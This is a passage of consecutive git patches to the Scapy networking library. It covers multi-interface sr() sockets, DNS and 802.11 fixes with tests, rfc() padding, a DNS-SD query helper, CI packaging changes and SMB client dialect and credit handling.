sock.setsockopt(SOL_NETLINK, NETLINK_GET_STRICT_CHK, 1) + try: + sock.setsockopt(SOL_NETLINK, NETLINK_GET_STRICT_CHK, 1) + except OSError: + # Linux 4.20+ only + pass # Request routes sock.send(bytes(rtmsghdrs(msgs=[pkt]))) results: List[Packet] = [] From 891e44da58071943ae673b7445c84674f133b7ac Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 30 Jul 2024 20:40:24 +0200 Subject: [PATCH 1332/1632] Fix sr() on multiple interfaces (#4474) --- scapy/arch/bpf/supersocket.py | 51 +++++++++++++++++---- scapy/arch/libpcap.py | 71 +++++++++++++++++++++-------- scapy/arch/linux/__init__.py | 86 +++++++++++++++++++++++++++-------- scapy/layers/inet6.py | 2 + scapy/sendrecv.py | 2 +- test/sendsniff.uts | 36 +++++++++++++++ 6 files changed, 201 insertions(+), 47 deletions(-) diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index c4085669cf3..3789c4583b3 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -115,7 +115,7 @@ def __init__(self, ) self.fd_flags = None # type: Optional[int] - self.assigned_interface = None + self.type = type # SuperSocket mandatory variables if promisc is None: @@ -155,7 +155,6 @@ def __init__(self, ) except IOError: raise Scapy_Exception("BIOCSETIF failed on %s" % self.iface) - self.assigned_interface = self.iface # Set the interface into promiscuous if self.promisc: @@ -466,6 +465,25 @@ def nonblock_recv(self): class L3bpfSocket(L2bpfSocket): + def __init__(self, + iface=None, # type: Optional[_GlobInterfaceType] + type=ETH_P_ALL, # type: int + promisc=None, # type: Optional[bool] + filter=None, # type: Optional[str] + nofilter=0, # type: int + monitor=False, # type: bool + ): + super(L3bpfSocket, self).__init__( + iface=iface, + type=type, + promisc=promisc, + filter=filter, + nofilter=nofilter, + monitor=monitor, + ) + self.filter = filter + self.send_socks = {network_name(self.iface): self} + def recv(self, x: int = BPF_BUFFER_LENGTH, **kwargs: Any) -> Optional['Packet']: """Receive on layer 3""" r = SuperSocket.recv(self, x, **kwargs) @@ -485,12 +503,14 @@ def send(self, pkt): iff = network_name(conf.iface) # Assign the network interface to the BPF handle - if self.assigned_interface != iff: - try: - fcntl.ioctl(self.bpf_fd, BIOCSETIF, struct.pack("16s16x", iff.encode())) # noqa: E501 - except IOError: - raise Scapy_Exception("BIOCSETIF failed on %s" % iff) - self.assigned_interface = iff + if iff not in self.send_socks: + self.send_socks[iff] = L3bpfSocket( + iface=iff, + type=self.type, + filter=self.filter, + promisc=self.promisc, + ) + fd = self.send_socks[iff] # Build the frame # @@ -529,12 +549,23 @@ def send(self, pkt): warning("Cannot write to %s according to the documentation!", iff) return else: - frame = self.guessed_cls() / pkt + frame = fd.guessed_cls() / pkt pkt.sent_time = time.time() # Send the frame - return L2bpfSocket.send(self, frame) + return L2bpfSocket.send(fd, frame) + + @staticmethod + def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] + socks = [] # type: List[SuperSocket] + for sock in sockets: + if isinstance(sock, L3bpfSocket): + socks += sock.send_socks.values() + else: + socks.append(sock) + return L2bpfSocket.select(socks, remain=remain) # Sockets manipulation functions diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 4d51709cb07..21587452413 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -17,7 +17,12 @@ from scapy.compat import raw, plain_str from scapy.config import conf from scapy.consts import WINDOWS -from scapy.data import MTU, ETH_P_ALL +from scapy.data import ( + DLT_RAW_ALT, + DLT_RAW, + ETH_P_ALL, + MTU, +) from scapy.error import ( Scapy_Exception, log_loading, @@ -78,20 +83,27 @@ class _L2libpcapSocket(SuperSocket): - __slots__ = ["pcap_fd"] + __slots__ = ["pcap_fd", "lvl"] def __init__(self, fd): # type: (_PcapWrapper_libpcap) -> None self.pcap_fd = fd ll = self.pcap_fd.datalink() if ll in conf.l2types: - self.cls = conf.l2types[ll] + self.LL = conf.l2types[ll] + if ll in [ + DLT_RAW, + DLT_RAW_ALT, + ]: + self.lvl = 3 + else: + self.lvl = 2 else: - self.cls = conf.default_l2 + self.LL = conf.default_l2 warning( "Unable to guess datalink type " "(interface=%s linktype=%i). Using %s", - self.iface, ll, self.cls.name + self.iface, ll, self.LL.name ) def recv_raw(self, x=MTU): @@ -103,7 +115,7 @@ def recv_raw(self, x=MTU): ts, pkt = self.pcap_fd.next() if pkt is None: return None, None, None - return self.cls, pkt, ts + return self.LL, pkt, ts def nonblock_recv(self, x=MTU): # type: (int) -> Optional[Packet] @@ -540,6 +552,7 @@ def __init__(self, if iface is None: iface = conf.iface self.iface = iface + self.type = type if promisc is not None: self.promisc = promisc else: @@ -580,6 +593,7 @@ def __init__(self, filter = "(ether proto %i) and (%s)" % (type, filter) else: filter = "ether proto %i" % type + self.filter = filter if filter: self.pcap_fd.setfilter(filter) @@ -598,12 +612,12 @@ class L3pcapSocket(L2pcapSocket): def __init__(self, *args, **kwargs): # type: (*Any, **Any) -> None super(L3pcapSocket, self).__init__(*args, **kwargs) - self.send_pcap_fds = {network_name(self.iface): self.pcap_fd} + self.send_socks = {network_name(self.iface): self} def recv(self, x=MTU, **kwargs): # type: (int, **Any) -> Optional[Packet] r = L2pcapSocket.recv(self, x, **kwargs) - if r: + if r and self.lvl == 2: r.payload.time = r.time return r.payload return r @@ -614,28 +628,49 @@ def send(self, x): iff = x.route()[0] if iff is None: iff = network_name(conf.iface) - if iff not in self.send_pcap_fds: - self.send_pcap_fds[iff] = fd = open_pcap( - device=iff, - snaplen=0, - promisc=False, - to_ms=0, + type_x = type(x) + if iff not in self.send_socks: + self.send_socks[iff] = L3pcapSocket( + iface=iff, + type=self.type, + filter=self.filter, + promisc=self.promisc, + monitor=self.monitor, ) + sock = self.send_socks[iff] + fd = sock.pcap_fd + if sock.lvl == 3: + if not issubclass(sock.LL, type_x): + warning("Incompatible L3 types detected using %s instead of %s !", + type_x, sock.LL) + sock.LL = type_x + if sock.lvl == 2: + sx = bytes(sock.LL() / x) else: - fd = self.send_pcap_fds[iff] + sx = bytes(x) # Now send. - sx = raw(self.cls() / x) try: x.sent_time = time.time() except AttributeError: pass return fd.send(sx) + @staticmethod + def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] + socks = [] # type: List[SuperSocket] + for sock in sockets: + if isinstance(sock, L3pcapSocket): + socks += sock.send_socks.values() + else: + socks.append(sock) + return L2pcapSocket.select(socks, remain=remain) + def close(self): # type: () -> None if self.closed: return super(L3pcapSocket, self).close() - for fd in self.send_pcap_fds.values(): - if fd is not self.pcap_fd: + for fd in self.send_socks.values(): + if fd is not self: fd.close() diff --git a/scapy/arch/linux/__init__.py b/scapy/arch/linux/__init__.py index 7bdb17e1265..86c8e92f826 100644 --- a/scapy/arch/linux/__init__.py +++ b/scapy/arch/linux/__init__.py @@ -57,8 +57,8 @@ # Typing imports from typing import ( Any, - Callable, Dict, + List, NoReturn, Optional, Tuple, @@ -322,6 +322,26 @@ def send(self, x): class L3PacketSocket(L2Socket): desc = "read/write packets at layer 3 using Linux PF_PACKET sockets" + def __init__(self, + iface=None, # type: Optional[Union[str, NetworkInterface]] + type=ETH_P_ALL, # type: int + promisc=None, # type: Optional[Any] + filter=None, # type: Optional[Any] + nofilter=0, # type: int + monitor=None, # type: Optional[Any] + ): + self.send_socks = {} + super(L3PacketSocket, self).__init__( + iface=iface, + type=type, + promisc=promisc, + filter=filter, + nofilter=nofilter, + monitor=monitor, + ) + self.filter = filter + self.send_socks = {network_name(self.iface): self} + def recv(self, x=MTU, **kwargs): # type: (int, **Any) -> Optional[Packet] pkt = SuperSocket.recv(self, x, **kwargs) @@ -332,39 +352,69 @@ def recv(self, x=MTU, **kwargs): def send(self, x): # type: (Packet) -> int + # Select the file descriptor to send the packet on. iff = x.route()[0] if iff is None: iff = network_name(conf.iface) - sdto = (iff, self.type) - self.outs.bind(sdto) - sn = self.outs.getsockname() - ll = lambda x: x # type: Callable[[Packet], Packet] type_x = type(x) - if type_x in conf.l3types: - sdto = (iff, conf.l3types.layer2num[type_x]) - if sn[3] in conf.l2types: - ll = lambda x: conf.l2types.num2layer[sn[3]]() / x - if self.lvl == 3 and not issubclass(self.LL, type_x): - warning("Incompatible L3 types detected using %s instead of %s !", - type_x, self.LL) - self.LL = type_x - sx = raw(ll(x)) - x.sent_time = time.time() + if iff not in self.send_socks: + self.send_socks[iff] = L3PacketSocket( + iface=iff, + type=conf.l3types.layer2num.get(type_x, self.type), + filter=self.filter, + promisc=self.promisc, + ) + sock = self.send_socks[iff] + fd = sock.outs + if sock.lvl == 3: + if not issubclass(sock.LL, type_x): + warning("Incompatible L3 types detected using %s instead of %s !", + type_x, sock.LL) + sock.LL = type_x + if sock.lvl == 2: + sx = bytes(sock.LL() / x) + else: + sx = bytes(x) + # Now send. + try: + x.sent_time = time.time() + except AttributeError: + pass try: - return self.outs.sendto(sx, sdto) + return fd.send(sx) except socket.error as msg: if msg.errno == 22 and len(sx) < conf.min_pkt_size: - return self.outs.send( + return fd.send( sx + b"\x00" * (conf.min_pkt_size - len(sx)) ) elif conf.auto_fragment and msg.errno == 90: i = 0 for p in x.fragment(): - i += self.outs.sendto(raw(ll(p)), sdto) + i += fd.send(bytes(self.LL() / p)) return i else: raise + @staticmethod + def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] + socks = [] # type: List[SuperSocket] + for sock in sockets: + if isinstance(sock, L3PacketSocket): + socks += sock.send_socks.values() + else: + socks.append(sock) + return L2Socket.select(socks, remain=remain) + + def close(self): + # type: () -> None + if self.closed: + return + super(L3PacketSocket, self).close() + for fd in self.send_socks.values(): + if fd is not self: + fd.close() + class VEthPair(object): """ diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 694f9345817..18d5f2f2fda 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -492,6 +492,8 @@ class IPv46(IP, IPv6): This class implements a dispatcher that is used to detect the IP version while parsing Raw IP pcap files. """ + name = "IPv4/6" + @classmethod def dispatch_hook(cls, _pkt=None, *_, **kargs): if _pkt: diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 437241c4d9b..4e020d70dba 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1285,7 +1285,7 @@ def stop_cb(): for p in packets: if lfilter and not lfilter(p): continue - p.sniffed_on = sniff_sockets[s] + p.sniffed_on = sniff_sockets.get(s, None) # post-processing self.count += 1 if store: diff --git a/test/sendsniff.uts b/test/sendsniff.uts index 278648122ef..1a2ed99c4a5 100644 --- a/test/sendsniff.uts +++ b/test/sendsniff.uts @@ -359,3 +359,39 @@ if conf.use_pypy: tap0.close() else: del tap0 + +##### +##### ++ Test sr() on multiple interfaces + += Setup multiple linux interfaces and ranges +~ linux needs_root dbg + +import os +exit_status = os.system("ip netns add blob0") +exit_status |= os.system("ip netns add blob1") +exit_status |= os.system("ip link add name scapy0.0 type veth peer name scapy0.1") +exit_status |= os.system("ip link add name scapy1.0 type veth peer name scapy1.1") +exit_status |= os.system("ip link set scapy0.1 netns blob0 up") +exit_status |= os.system("ip link set scapy1.1 netns blob1 up") +exit_status |= os.system("ip addr add 100.64.2.1/24 dev scapy0.0") +exit_status |= os.system("ip addr add 100.64.3.1/24 dev scapy1.0") +exit_status |= os.system("ip --netns blob0 addr add 100.64.2.2/24 dev scapy0.1") +exit_status |= os.system("ip --netns blob1 addr add 100.64.3.2/24 dev scapy1.1") +exit_status |= os.system("ip link set scapy0.0 up") +exit_status |= os.system("ip link set scapy1.0 up") +assert exit_status == 0 + +conf.ifaces.reload() +conf.route.resync() + +try: + pkts = sr(IP(dst=["100.64.2.2", "100.64.3.2"])/ICMP(), timeout=1)[0] + assert len(pkts) == 2 + assert pkts[0].answer.src in ["100.64.2.2", "100.64.3.2"] + assert pkts[1].answer.src in ["100.64.2.2", "100.64.3.2"] +finally: + e = os.system("ip netns del blob0") + e = os.system("ip netns del blob1") + conf.ifaces.reload() + conf.route.resync() From 4e946118587beaecae31d21f242a4057f29c76e8 Mon Sep 17 00:00:00 2001 From: Wes <5124946+wesinator@users.noreply.github.com> Date: Tue, 30 Jul 2024 14:46:28 -0400 Subject: [PATCH 1333/1632] DNS - correct rr type `0` to be in line with RFC (#4425) set dns rr type `0` label to "RESERVED", per latest IANA + RFC --- scapy/layers/dns.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 2da34cebce3..56278e17540 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -72,7 +72,7 @@ # https://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-4 dnstypes = { - 0: "ANY", + 0: "RESERVED", 1: "A", 2: "NS", 3: "MD", 4: "MF", 5: "CNAME", 6: "SOA", 7: "MB", 8: "MG", 9: "MR", 10: "NULL", 11: "WKS", 12: "PTR", 13: "HINFO", 14: "MINFO", 15: "MX", 16: "TXT", 17: "RP", 18: "AFSDB", 19: "X25", 20: "ISDN", From 64cb0c0cdaa039d8ac80378c1c99e0487a7c8281 Mon Sep 17 00:00:00 2001 From: rkinder2023 <138834119+rkinder2023@users.noreply.github.com> Date: Wed, 31 Jul 2024 04:50:35 +1000 Subject: [PATCH 1334/1632] Dot11EltVHTOperation, Dot11EltOBSS and Dot11EltCSA should match Dot11Elt (#4484) 'match_subclass' class variable, which seemingly implies that search for the given IE via: pkt[Dot11Elt::{'ID': }] will not work in some cases. Fix is to enable match_subclass, with additional 'isolation' unit tests added for these IEs. --- scapy/layers/dot11.py | 3 +++ test/scapy/layers/dot11.uts | 15 +++++++++++++++ 2 files changed, 18 insertions(+) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 8ed4d38cd0e..3e0dced1d58 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1450,6 +1450,7 @@ class Dot11EltMicrosoftWPA(Dot11EltVendorSpecific): class Dot11EltCSA(Dot11Elt): name = "802.11 CSA Element" + match_subclass = True fields_desc = [ ByteEnumField("ID", 37, _dot11_id_enum), ByteField("len", 3), @@ -1463,6 +1464,7 @@ class Dot11EltCSA(Dot11Elt): class Dot11EltOBSS(Dot11Elt): name = "802.11 OBSS Scan Parameters Element" + match_subclass = True fields_desc = [ ByteEnumField("ID", 74, _dot11_id_enum), ByteField("len", 14), @@ -1492,6 +1494,7 @@ def extract_padding(self, s): class Dot11EltVHTOperation(Dot11Elt): name = "802.11 VHT Operation Element" + match_subclass = True fields_desc = [ ByteEnumField("ID", 192, _dot11_id_enum), ByteField("len", 5), diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index 944df86d370..06a45e01a29 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -763,3 +763,18 @@ assert pkt[Dot11EltVHTOperation].VHT_Operation_Info assert pkt[Dot11EltVHTOperation].VHT_Operation_Info.channel_width == 1 assert pkt[Dot11EltVHTOperation].VHT_Operation_Info.channel_center0 == 42 assert pkt[Dot11EltVHTOperation].VHT_Operation_Info.channel_center1 == 50 + += Dot11EltVHTOperation in isolation + +pkt = Dot11EltVHTOperation(b'\xc0\x05\x01*2\x00\x00') +assert pkt[Dot11Elt::{"ID": 192}].len == 5 + += Dot11EltOBSS in isolation + +pkt = Dot11EltOBSS(b'J\x0e\x14\x00\n\x00,\x01\xc8\x00\x14\x00\x05\x00\x19\x00') +assert pkt[Dot11Elt::{"ID": 74}].len == 14 + += Dot11EltCSA in isolation + +pkt = Dot11EltCSA(b'%\x03\x01\x0b\x05') +assert pkt[Dot11Elt::{"ID": 37}].len == 3 From 7592f5f1c63c1eec7b072c8ed8b3f9a86000231f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 30 Jul 2024 21:17:03 +0200 Subject: [PATCH 1335/1632] Support PadField in rfc() (#4477) --- scapy/packet.py | 21 +++++++++++++++++---- test/regression.uts | 29 ++++++++++++++++++++++++++++- 2 files changed, 45 insertions(+), 5 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 6b813986f3d..0e096b2c690 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -35,6 +35,7 @@ MayEnd, MultiEnumField, MultipleTypeField, + PadField, PacketListField, RawVal, StrField, @@ -2513,13 +2514,25 @@ def rfc(cls, ret=False, legend=True): # when formatted, from its length in bits clsize = lambda x: 2 * x - 1 # type: Callable[[int], int] ident = 0 # Fields UUID + # Generate packet groups - for f in cls.fields_desc: - flen = int(f.sz * 8) + def _iterfields() -> Iterator[Tuple[str, int]]: + for f in cls.fields_desc: + # Fancy field name + fname = f.name.upper().replace("_", " ") + fsize = int(f.sz * 8) + yield fname, fsize + # Add padding optionally + if isinstance(f, PadField): + if isinstance(f._align, tuple): + pad = - cur_len % (f._align[0] * 8) + else: + pad = - cur_len % (f._align * 8) + if pad: + yield "padding", pad + for fname, flen in _iterfields(): cur_len += flen ident += 1 - # Fancy field name - fname = f.name.upper().replace("_", " ") # The field might exceed the current line or # take more than one line. Copy it as required while True: diff --git a/test/regression.uts b/test/regression.uts index 53f4b329901..68f7d30f245 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -127,7 +127,7 @@ assert result == '\\#\\#\\#[ \\textcolor{red}{\\bf SmallPacket} ]\\#\\#\\#\n \\ conf.color_theme = conf_color_theme -= Test automatic doc generation += Test rfc() ~ command dat = rfc(IP, ret=True).split("\n") @@ -211,6 +211,33 @@ result = [x.strip() for x in result.split("\n")] output = [x.strip() for x in rfc(IPv6, ret=True).strip().split("\n")] assert result == output + +class TestPad(Packet): + fields_desc = [ShortField("f0", 0), + ShortField("f1", 0), + PadField(ByteField("f2", 1), 8), + PadField(ShortField("f3", 0), 4)] + + +result = """ + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | F0 | F1 | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | F2 | padding | + +-+-+-+-+-+-+-+-+ + + | | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | F3 | padding | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + Fig. TestPad +""".strip() +result = [x.strip() for x in result.split("\n")] +output = [x.strip() for x in rfc(TestPad, ret=True).strip().split("\n")] +assert result == output + = Check that all contrib modules are well-configured ~ command list_contrib(_debug=True) From 18b3d6c4d6e6fb5188a2f0edfd76623d5ffa7840 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 30 Jul 2024 21:20:56 +0200 Subject: [PATCH 1336/1632] Util to request DNS-SD (#4481) --- scapy/layers/dns.py | 97 ++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 95 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 56278e17540..0f1b3deb623 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -4,7 +4,12 @@ # Copyright (C) Philippe Biondi """ -DNS: Domain Name System. +DNS: Domain Name System + +This implements: +- RFC1035: Domain Names +- RFC6762: Multicast DNS +- RFC6763: DNS-Based Service Discovery """ import abc @@ -52,13 +57,16 @@ XStrLenField, ) from scapy.interfaces import resolve_iface -from scapy.sendrecv import sr1 +from scapy.sendrecv import sr1, sr from scapy.supersocket import StreamSocket +from scapy.plist import SndRcvList, _PacketList, QueryAnswer from scapy.pton_ntop import inet_ntop, inet_pton +from scapy.utils import pretty_list from scapy.volatile import RandShort from scapy.layers.l2 import Ether from scapy.layers.inet import IP, DestIPField, IPField, UDP, TCP +from scapy.layers.inet6 import IPv6 from typing import ( Any, @@ -1897,3 +1905,88 @@ class mDNS_am(DNS_am): """ function_name = "mdnsd" filter = "udp port 5353" + + +# DNS-SD (RFC 6763) + + +class DNSSDResult(SndRcvList): + def __init__(self, + res=None, # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]] # noqa: E501 + name="DNS-SD", # type: str + stats=None # type: Optional[List[Type[Packet]]] + ): + SndRcvList.__init__(self, res, name, stats) + + def show(self, *args, **kwargs): + # type: (*Any, **Any) -> None + """ + Print the list of discovered services. + + :param types: types to show. Default ['PTR', 'SRV'] + :param alltypes: show all types. Default False + """ + types = kwargs.get("types", ['PTR', 'SRV']) + alltypes = kwargs.get("alltypes", False) + if alltypes: + types = None + data = list() # type: List[Tuple[str | List[str], ...]] + + resolve_mac = ( + self.res and isinstance(self.res[0][1].underlayer, Ether) and + conf.manufdb + ) + + header = ("IP", "Service") + if resolve_mac: + header = ("Mac",) + header + + for _, r in self.res: + attrs = [] + for attr in itertools.chain(r[DNS].an, r[DNS].ar): + if types and dnstypes.get(attr.type) not in types: + continue + if isinstance(attr, DNSRRNSEC): + attrs.append(attr.sprintf("%type%=%nextname%")) + elif isinstance(attr, DNSRRSRV): + attrs.append(attr.sprintf("%type%=(%target%,%port%)")) + else: + attrs.append(attr.sprintf("%type%=%rdata%")) + ans = (r.src, attrs) + if resolve_mac: + mac = conf.manufdb._resolve_MAC(r.underlayer.src) + data.append((mac,) + ans) + else: + data.append(ans) + + print( + pretty_list( + data, + [header], + ) + ) + + +@conf.commands.register +def dnssd(service="_services._dns-sd._udp.local", + af=socket.AF_INET6, + qtype="PTR", + timeout=3): + """ + Performs a DNS-SD (RFC6763) request + + :param service: the service name to query (e.g. _spotify-connect._tcp.local) + :param af: the transport to use. socket.AF_INET or socket.AF_INET6 + :param qtype: the type to use in the mDNS. Either TXT, PTR or SRV. + :param ret: return instead of printing + """ + if af == socket.AF_INET: + pkt = IP(dst="224.0.0.251") + elif af == socket.AF_INET6: + pkt = IPv6(dst="ff02::fb") + else: + return + pkt /= UDP(sport=5353, dport=5353) + pkt /= DNS(rd=0, qd=[DNSQR(qname=service, qtype=qtype)]) + ans, _ = sr(pkt, multi=True, timeout=timeout) + return DNSSDResult(ans.res) From 0548582f7734dc4619365cd807bd1b38199bfd7c Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Thu, 1 Aug 2024 18:28:09 +0300 Subject: [PATCH 1337/1632] packit: no longer install mock (#4487) because it isn't used anymore. It's a follow-up to 8ac13e7c15dc77a322959092d5847a1513ac6f33 --- .packit.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.packit.yml b/.packit.yml index f178904aca0..656cf0d7abe 100644 --- a/.packit.yml +++ b/.packit.yml @@ -23,7 +23,6 @@ actions: - "sed -i '/^BuildArch/aBuildRequires: openssl' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: tcpdump' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: wireshark' .packit_rpm/scapy.spec" - - "sed -i '/^BuildArch/aBuildRequires: python3-mock' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: python3-ipython' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: python3-brotli' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: python3-can' .packit_rpm/scapy.spec" From cb784e0e693057e02102fbfdc917e3c4f800aa48 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Fri, 2 Aug 2024 20:52:09 +0300 Subject: [PATCH 1338/1632] packit: set up OPENSSL_CONF properly (#4489) openssl got updated on Fedora Rawhide and its defaults are no longer compatible with the test suite. `.config/ci/openssl.py` sets it up and gets the tests to pass there. Closes https://github.com/secdev/scapy/issues/4470 --- .packit.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.packit.yml b/.packit.yml index 656cf0d7abe..18efdebec6f 100644 --- a/.packit.yml +++ b/.packit.yml @@ -17,7 +17,7 @@ actions: - "git clone https://src.fedoraproject.org/rpms/scapy .packit_rpm --depth=1" # Drop the "sources" file so rebase-helper doesn't think we're a dist-git - "rm -fv .packit_rpm/sources" - - "sed -i '/^# check$/a%check\\n./test/run_tests -c test/configs/linux.utsc -K scanner' .packit_rpm/scapy.spec" + - "sed -i '/^# check$/a%check\\nOPENSSL_CONF=$(python3 ./.config/ci/openssl.py) ./test/run_tests -c test/configs/linux.utsc -K scanner' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: can-utils' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: libpcap' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: openssl' .packit_rpm/scapy.spec" From 8af6fe4ce81086f41903deaff3afc99d174f1ef3 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 2 Aug 2024 19:53:00 +0200 Subject: [PATCH 1339/1632] SMB improvements & cleanups (smbclient 3.1.1+) (#4490) --- scapy/layers/smb2.py | 10 ++-- scapy/layers/smbclient.py | 80 +++++++++++++++++++-------- test/scapy/layers/smbclientserver.uts | 34 +++++++++--- 3 files changed, 89 insertions(+), 35 deletions(-) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 941cf09f835..4899e9dbb1c 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -31,7 +31,6 @@ FlagsField, IP6Field, IPField, - IntEnumField, IntField, LEIntField, LEIntEnumField, @@ -1889,7 +1888,7 @@ class SMB2_Compression_Capabilities(Packet): count_of="CompressionAlgorithms", ), ShortField("Padding", 0x0), - IntEnumField( + LEIntEnumField( "Flags", 0x0, { @@ -2425,7 +2424,7 @@ class SMB2_CREATE_QUERY_ON_DISK_ID(Packet): class SMB2_CREATE_RESPONSE_LEASE(Packet): fields_desc = [ - XStrFixedLenField("LeaseKey", b"", length=16), + UUIDField("LeaseKey", None), FlagsField( "LeaseState", 0x7, @@ -2452,7 +2451,7 @@ class SMB2_CREATE_RESPONSE_LEASE(Packet): class SMB2_CREATE_RESPONSE_LEASE_V2(Packet): fields_desc = [ SMB2_CREATE_RESPONSE_LEASE, - XStrFixedLenField("ParentLeaseKey", b"", length=16), + UUIDField("ParentLeaseKey", None), LEShortField("Epoch", 0), LEShortField("Reserved", 0), ] @@ -3953,7 +3952,7 @@ class SMB2_Compression_Transform_Header(Packet): StrFixedLenField("Start", b"\xfcSMB", 4), LEIntField("OriginalCompressedSegmentSize", 0x0), LEShortEnumField("CompressionAlgorithm", 0, SMB2_COMPRESSION_ALGORITHMS), - ShortEnumField( + LEShortEnumField( "Flags", 0x0, { @@ -4254,6 +4253,7 @@ def __init__(self, *args, **kwargs): # SMB session parameters self.CompoundQueue = [] self.Dialect = 0x0202 # Updated by parent + self.Credits = 0 self.SecurityMode = 0 # Crypto parameters self.SMBSessionKey = None diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 5acfe556f78..05c5d41e76e 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -72,6 +72,7 @@ DirectTCP, FileAllInformation, FileIdBothDirectoryInformation, + SMB_DIALECTS, SMB2_Change_Notify_Request, SMB2_Change_Notify_Response, SMB2_Close_Request, @@ -79,6 +80,7 @@ SMB2_Create_Context, SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2, SMB2_CREATE_REQUEST_LEASE_V2, + SMB2_CREATE_REQUEST_LEASE, SMB2_Create_Request, SMB2_Create_Response, SMB2_Encryption_Capabilities, @@ -126,7 +128,7 @@ class SMB_Client(Automaton): :param REQUIRE_SIGNATURE: set 'Require Signature' :param MIN_DIALECT: minimum SMB dialect. Defaults to 0x0202 (2.0.2) - :param MAX_DIALECT: maximum SMB dialect. Defaults to 0x0210 (2.1.0) + :param MAX_DIALECT: maximum SMB dialect. Defaults to 0x0311 (3.1.1) :param DIALECTS: list of supported SMB2 dialects. Constructed from MIN_DIALECT, MAX_DIALECT otherwise. """ @@ -147,8 +149,7 @@ def __init__(self, sock, ssp=None, *args, **kwargs): self.DIALECTS = kwargs.pop("DIALECTS") else: MIN_DIALECT = kwargs.pop("MIN_DIALECT", 0x0202) - # MAX_DIALECT is currently SMB 2.0.2. 3.1.1 support is unfinished - self.MAX_DIALECT = kwargs.pop("MAX_DIALECT", 0x0202) + self.MAX_DIALECT = kwargs.pop("MAX_DIALECT", 0x0311) self.DIALECTS = sorted( [ x @@ -161,6 +162,7 @@ def __init__(self, sock, ssp=None, *args, **kwargs): self.ErrorStatus = None self.NegotiateCapabilities = None self.GUID = RandUUID()._fix() + self.SequenceWindow = (0, 0) # keep track of allowed MIDs self.MaxTransactionSize = 0 self.MaxReadSize = 0 self.MaxWriteSize = 0 @@ -242,6 +244,10 @@ def send(self, pkt): else: # "For all other requests, the client MUST set CreditCharge to 1" pkt.CreditCharge = 1 + # [MS-SMB2] 3.2.4.1.2 + pkt.CreditRequest = pkt.CreditCharge + 1 # this code is a bit lazy + # Get first available message ID: [MS-SMB2] 3.2.4.1.3 and 3.2.4.1.5 + pkt.MID = self.SequenceWindow[0] return super(SMB_Client, self).send(pkt) @ATMT.state(initial=1) @@ -375,15 +381,6 @@ def on_negotiate_smb2(self): @ATMT.receive_condition(SENT_NEGOTIATE) def receive_negotiate_response(self, pkt): - if ( - SMBNegotiate_Response_Security in pkt - or SMBNegotiate_Response_Extended_Security in 